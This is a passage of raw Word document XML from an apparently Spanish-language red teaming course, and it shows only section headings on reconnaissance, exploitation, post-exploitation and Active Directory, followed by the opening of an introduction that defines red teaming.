          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4331"/>
        </w:tabs>
        <w:spacing w:before="90"/>
        <w:ind w:left="4331" w:hanging="986"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Escaneo y enumeración</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625891C9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4331"/>
        </w:tabs>
        <w:spacing w:before="93"/>
        <w:ind w:left="4331" w:hanging="986"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Evaluación de vulnerabilidades</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADDC759" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4331"/>
        </w:tabs>
        <w:spacing w:before="92"/>
        <w:ind w:left="4331" w:hanging="986"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Explotación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2935A0C9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5298"/>
        </w:tabs>
        <w:spacing w:before="91"/>
        <w:ind w:left="5298" w:hanging="513"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Basado en la web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096617D0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5282"/>
        </w:tabs>
        <w:spacing w:before="93"/>
        <w:ind w:left="5282" w:hanging="497"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Basado en la red</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAC4368" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="986"/>
        </w:tabs>
        <w:spacing w:before="92"/>
        <w:ind w:left="986" w:right="12106" w:hanging="986"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Post-Explotación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A2B323" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="513"/>
        </w:tabs>
        <w:spacing w:before="90"/>
        <w:ind w:left="513" w:right="12088" w:hanging="513"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Basado en la web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BF350E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5282"/>
        </w:tabs>
        <w:spacing w:before="93"/>
        <w:ind w:left="5282" w:hanging="497"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Basado en la red</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D635725" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1100" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="298" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5712DFFC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2001"/>
        </w:tabs>
        <w:spacing w:line="642" w:lineRule="exact"/>
        <w:ind w:left="2001" w:hanging="817"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Red Teaming en el entorno interno</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A27B392" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3020A688" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2589"/>
        </w:tabs>
        <w:ind w:left="2589" w:hanging="685"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Descripción general de la infraestructura interna</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA1759D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2589"/>
        </w:tabs>
        <w:spacing w:before="92"/>
        <w:ind w:left="2589" w:hanging="685"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Enumeración de infraestructura</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2029E972" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4331"/>
        </w:tabs>
        <w:spacing w:before="93"/>
        <w:ind w:left="4331" w:hanging="986"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Enumeración de red interna</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ED72FD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4331"/>
        </w:tabs>
        <w:spacing w:before="90"/>
        <w:ind w:left="4331" w:hanging="986"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Entorno de Active Directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A610CB4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2589"/>
        </w:tabs>
        <w:spacing w:before="93"/>
        <w:ind w:left="2589" w:hanging="685"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Explotación de fases de Active Directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28314975" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="212"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05DBE5D9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1916"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="1916" w:hanging="813"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Estudio de casos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600D6F3A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1100" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="298" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E70E327" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BC73C43" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="355FC22A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35A88758" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D5D1CC1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="177"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1824CD2A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:ind w:left="3256"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C481F56" wp14:editId="15E6EC01">
                <wp:extent cx="8056245" cy="3014980"/>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6245" cy="3014980"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="B34512"/>
                        </a:solidFill>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="29A977C3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="965" w:line="211" w:lineRule="auto"/>
                              <w:ind w:left="3097" w:hanging="1719"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Calibri Light"/>
                                <w:color w:val="000000"/>
                                <w:sz w:val="120"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Calibri Light"/>
                                <w:color w:val="FFFFFF"/>
                                <w:spacing w:val="-8"/>
                                <w:sz w:val="120"/>
                              </w:rPr>
                              <w:t>1. INTRODUCCI</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Calibri Light"/>
                                <w:color w:val="FFFFFF"/>
                                <w:spacing w:val="-8"/>
                                <w:sz w:val="120"/>
                              </w:rPr>
                              <w:t>Ó</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Calibri Light"/>
                                <w:color w:val="FFFFFF"/>
                                <w:spacing w:val="-8"/>
                                <w:sz w:val="120"/>
                              </w:rPr>
                              <w:t>N AL RED TEAMING</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="1C481F56" id="Textbox 18" o:spid="_x0000_s1036" type="#_x0000_t202" style="width:634.35pt;height:2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" fillcolor="#b34512" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="29A977C3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="965" w:line="211" w:lineRule="auto"/>
                        <w:ind w:left="3097" w:hanging="1719"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Calibri Light"/>
                          <w:color w:val="000000"/>
                          <w:sz w:val="120"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Calibri Light"/>
                          <w:color w:val="FFFFFF"/>
                          <w:spacing w:val="-8"/>
                          <w:sz w:val="120"/>
                        </w:rPr>
                        <w:t>1. INTRODUCCI</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Calibri Light"/>
                          <w:color w:val="FFFFFF"/>
                          <w:spacing w:val="-8"/>
                          <w:sz w:val="120"/>
                        </w:rPr>
                        <w:t>Ó</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Calibri Light"/>
                          <w:color w:val="FFFFFF"/>
                          <w:spacing w:val="-8"/>
                          <w:sz w:val="120"/>
                        </w:rPr>
                        <w:t>N AL RED TEAMING</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DF8ECF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1220" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="298" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59769123" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15732224" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="56F899F6" wp14:editId="1A3743AB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12192000" cy="11938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20" name="Graphic 20"/>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21" name="Textbox 21"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1193800"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4F05B76F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:before="271"/>
                                <w:ind w:left="4910"/>
                                <w:rPr>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>1.1 ¿Qué es el Red Teaming?</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="56F899F6" id="Group 19" o:spid="_x0000_s1037" style="position:absolute;margin-left:0;margin-top:0;width:960pt;height:94pt;z-index:15732224;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">
                <v:shape id="Graphic 20" o:spid="_x0000_s1038"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" path="m12192000,l,,,1193291r12192000,l12192000,xe" fillcolor="#b34512" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Textbox 21" o:spid="_x0000_s1039"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F05B76F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:before="271"/>
                          <w:ind w:left="4910"/>
                          <w:rPr>
                            <w:sz w:val="88"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>1.1 ¿Qué es el Red Teaming?</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AAC1CF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15D9F0BA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64F4D0D5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="14"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EFC5D3D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1561"/>
        </w:tabs>
        <w:spacing w:line="631" w:lineRule="exact"/>
        <w:ind w:hanging="487"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Un Red Team es un grupo de hackers con diferentes antecedentes que ponen a prueba la</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39141025" w14:textId="14214119" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E" w:rsidP="007A7B84">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:line="563" w:lineRule="exact"/>
        <w:ind w:left="1434"/>
        <w:rPr>
